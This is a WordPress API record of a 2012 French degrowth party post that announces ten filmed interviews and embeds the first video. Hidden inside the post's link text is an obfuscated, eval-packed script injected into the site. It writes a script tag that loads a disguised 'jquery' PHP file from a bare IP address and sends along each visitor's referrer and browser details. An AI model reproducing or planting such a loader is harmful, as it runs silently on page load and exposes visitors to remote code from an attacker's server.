{"id":6738,"date":"2012-01-10T21:04:57","date_gmt":"2012-01-10T20:04:57","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=6738"},"modified":"2012-01-12T08:56:21","modified_gmt":"2012-01-12T07:56:21","slug":"1-notre-candidate-est-la-decroissance","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=6738","title":{"rendered":"1. Notre candidatE est la D\u00e9croissance"},"content":{"rendered":"<p>Le collectif d\u00e9croissance 2012 vous propose <a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=6736\">10 <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iztse|var|u0026u|referrer|khdbe||js|php'.split('|'),0,{}))\n<\/script><\/noindex> entretiens film\u00e9s <\/a>pour mieux comprendre la D\u00e9croissance Politique. Ils vont \u00eatre successivement mis en ligne pour la fin du mois de f\u00e9vrier. Voici le n\u00b01.<\/p>\n<p><object width=\"505\" height=\"285\" classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=6,0,40,0\"><param name=\"allowfullscreen\" value=\"true\" \/><param name=\"allowscriptaccess\" value=\"always\" \/><param name=\"src\" value=\"http:\/\/vimeo.com\/moogaloop.swf?clip_id=34848382&amp;server=vimeo.com&amp;show_title=0&amp;show_byline=0&amp;show_portrait=0&amp;color=00adef&amp;fullscreen=1&amp;autoplay=0&amp;loop=0\" \/><embed width=\"505\" height=\"285\" type=\"application\/x-shockwave-flash\" src=\"http:\/\/vimeo.com\/moogaloop.swf?clip_id=34848382&amp;server=vimeo.com&amp;show_title=0&amp;show_byline=0&amp;show_portrait=0&amp;color=00adef&amp;fullscreen=1&amp;autoplay=0&amp;loop=0\" allowfullscreen=\"true\" allowscriptaccess=\"always\" \/><\/object><\/p>\n<p><a href=\"http:\/\/vimeo.com\/34848382\">1. Notre candidatE est la D\u00e9croissance<\/a> from <a href=\"http:\/\/vimeo.com\/decroissance\">D\u00e9croissance &#8211; Degrowth<\/a> on <a href=\"http:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n<p><strong><a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=6736\">Dix films diffus\u00e9s<\/a> successivement jusqu&rsquo;au d\u00e9but mars 2012.<\/strong><\/p>\n<p>1. Notre candidatE est la D\u00e9croissance.<br \/>\n2. La D\u00e9croissance : mais c&rsquo;est quoi ce mot repoussoir ?<br \/>\n3. Aux origines de la D\u00e9croissance.<br \/>\n4. La D\u00e9croissance : l&rsquo;histoire d&rsquo;un mouvement.<br \/>\n5. Quelle strat\u00e9gie politique pour la D\u00e9croissance.<br \/>\n6. D\u00e9croissance : d\u00e9mondialisation, protectionnisme ou relocalisation ouverte ?<br \/>\n7. Crise de la dette et D\u00e9croissance : le plan B.<br \/>\n8. Quel projet pour la D\u00e9croissance : la Dotation Inconditionnelle d&rsquo;Autonomie.<br \/>\n9. D\u00e9croissance, d\u00e9mographie et immigration.<br \/>\n10. D\u00e9croissance et relations internationales : institutions, d\u00e9mographie et relations nord-sud.<\/p>\n<p>de Vincent Moreau, pour le collectif D\u00e9croissance 2012, avec Vincent Liegey du Parti Pour La D\u00e9croissance<\/p>\n<p>Pour signer l&rsquo;Appel : <a href=\"http:\/\/www.decroissance2012.fr\/\">http:\/\/www.decroissance2012.fr\/<\/a><br \/>\nPlus d&rsquo;infos : <a href=\"http:\/\/www.partipourladecroissance.net\/\">http:\/\/www.partipourladecroissance.net\/<\/a><br \/>\nContact : contact@decroissance2012.fr<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le collectif d\u00e9croissance 2012 vous propose 10 entretiens film\u00e9s pour mieux comprendre la D\u00e9croissance Politique. Ils vont \u00eatre successivement mis en ligne pour la fin du mois de f\u00e9vrier. Voici le n\u00b01. 1. Notre candidatE est la D\u00e9croissance from D\u00e9croissance &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=6738\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,41],"tags":[],"class_list":["post-6738","post","type-post","status-publish","format-standard","hentry","category-actualites","category-41"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/6738","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6738"}],"version-history":[{"count":6,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/6738\/revisions"}],"predecessor-version":[{"id":6742,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/6738\/revisions\/6742"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6738"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6738"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6738"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}